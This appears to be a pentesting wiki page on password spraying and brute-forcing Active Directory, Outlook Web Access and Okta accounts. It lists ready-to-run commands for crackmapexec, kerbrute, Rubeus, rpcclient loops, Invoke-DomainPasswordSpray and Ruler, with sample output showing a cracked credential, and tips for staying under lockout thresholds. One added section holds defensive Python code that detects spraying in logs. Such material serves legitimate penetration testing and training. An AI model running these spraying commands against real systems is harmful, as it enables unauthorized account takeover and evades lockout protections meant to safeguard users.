# Password Spraying / Brute Force


## **Password Spraying**

Once you have found several **valid usernames**, you can try the **most common passwords** against each discovered user (keep the password policy of the environment in mind).\
By **default** the **minimum password length** is **7**.

A list of common usernames may also be useful: <https://github.com/insidetrust/statistically-likely-usernames>

Note that you **may lock out some accounts if you try several wrong passwords** (by default more than 10).

### Get the password policy

If you have some user credentials or a shell as a domain user, you can **get the password policy** with:

```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
```
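Added example (not part of the original page): detection logic for the spraying pattern described above, where one source fails against many distinct accounts while staying below the lockout threshold that the password policy reports. It runs over a constructed sample log in an assumed `timestamp,source,username,result` format (a real feed would be Windows 4625/4771 events or DC logs); the 30-minute window and the minimum of 5 distinct users are assumed tuning values, and the lockout threshold of 10 is the default mentioned above.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): "timestamp,source,username,result".
# 10.10.10.50 sprays one password across six accounts and gets a hit on the
# last one; 10.10.10.60 hammers a single account (brute force, not a spray).
SAMPLE_LOG = """\
2024-05-01T09:00:01,10.10.10.50,alice,FAIL
2024-05-01T09:00:02,10.10.10.50,bob,FAIL
2024-05-01T09:00:03,10.10.10.50,carol,FAIL
2024-05-01T09:00:04,10.10.10.50,dave,FAIL
2024-05-01T09:00:05,10.10.10.50,erin,FAIL
2024-05-01T09:00:06,10.10.10.50,frank,SUCCESS
2024-05-01T09:05:00,10.10.10.60,admin,FAIL
2024-05-01T09:05:01,10.10.10.60,admin,FAIL
2024-05-01T09:05:02,10.10.10.60,admin,FAIL
2024-05-01T08:59:00,192.168.1.5,carol,FAIL
2024-05-01T08:59:10,192.168.1.5,carol,SUCCESS
"""

def parse_events(text):
    """Parse CSV-style lines into sorted (timestamp, source, user, result) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, src, user, result = line.split(",")
        events.append((datetime.fromisoformat(ts), src, user.lower(), result))
    return sorted(events)

def detect_spray(events, window=timedelta(minutes=30), min_users=5, lockout_threshold=10):
    """Flag sources whose failures hit >= min_users distinct accounts within
    `window`. A spray keeps each account under the lockout threshold, so the
    alert also reports the highest failure count any single account saw."""
    failures = defaultdict(list)                # source -> [(ts, user), ...]
    for ts, src, user, result in events:
        if result == "FAIL":
            failures[src].append((ts, user))
    alerts = {}
    for src, fails in failures.items():         # fails is already time-ordered
        start = 0
        for end in range(len(fails)):           # sliding window over failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            window_fails = fails[start:end + 1]
            users = {u for _, u in window_fails}
            if len(users) >= min_users:
                per_user = Counter(u for _, u in window_fails)
                alerts[src] = {
                    "users": sorted(users),
                    "max_failures_per_user": max(per_user.values()),
                    "below_lockout": max(per_user.values()) < lockout_threshold,
                }
                break                           # one alert per source is enough
    return alerts
```

The single-account source is not flagged here because it is a brute-force pattern that the lockout policy itself already handles; the low per-user count combined with many distinct users is what distinguishes a spray.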

### Exploitation from Linux (or any platform)

* Using **crackmapexec:**

```bash
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## the --local-auth flag indicates to only try once per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```

* Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)

```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

* [**spray**](https://github.com/Greenwolf/Spray) ***(you can specify the number of attempts to avoid lockouts):***

```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```

* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - not recommended, it sometimes does not work

```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```

* Using the `scanner/smb/smb_login` module of **Metasploit**:

![](/files/ib2cDoDlEpJa9f8e7aFr)

* Using **rpcclient**:

```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```

#### From Windows

* Using the [Rubeus](https://github.com/Zer1t0/Rubeus) version with the brute module:

```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

* Using [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (by default it can enumerate users from the domain, fetch the domain password policy and limit the number of attempts according to it):

```powershell
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

* Using [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)

```powershell
Invoke-SprayEmptyPassword
```

## Brute Force

{% code overflow="wrap" %}
```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
{% endcode %}

## Outlook Web Access

There are several tools for password spraying against Outlook.

* Using [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
* Using [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
* Using [Ruler](https://github.com/sensepost/ruler) (reliable!)
* Using [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
* Using [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)

To use any of these tools you need a user list and a password, or a small list of passwords, to spray.

```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
```

## Google

* <https://github.com/ustayready/CredKing/blob/master/credking.py>

## Okta

* <https://github.com/ustayready/CredKing/blob/master/credking.py>
* <https://github.com/Rhynorater/Okta-Password-Sprayer>
* <https://github.com/knavesec/CredMaster>

## References

* <https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying>
* <https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell>
* <https://www.blackhillsinfosec.com/?p=5296>
* <https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying>
